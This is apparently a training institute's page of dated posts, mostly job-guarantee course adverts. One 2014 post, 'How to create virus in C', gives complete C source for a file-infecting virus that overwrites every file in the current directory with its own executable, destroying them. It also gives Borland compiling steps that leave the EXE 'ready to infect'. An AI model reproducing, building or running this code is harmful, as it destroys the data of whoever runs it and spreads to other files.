12/12/2015
AIS is going to start a new course for those who want to start their career in Data Analysis, MIS, VBA Programming, Business Intelligence. Course is going to start from 1 Jan, 2016. Each student will get job after completion of this course. Course Fee will be taken only after proving job to the student. For more details contact : 9899329565, email : [email protected]
15/07/2014
HOW TO CREATE - VIRUS IN C
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon ex*****on (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %sn”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SECn”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
23/04/2012
Get the benefit of this opportunity
10/12/2011
NOW AIS IS GOING TO START A NEW COURSE WHICH WILL GIVE U 'IT JOB' IN GOVT AND PVT SECTOR DEFINATELY
10/12/2011
Share this page with ur friends too...
07/12/2011
explore your knowledge by learning through ehow.com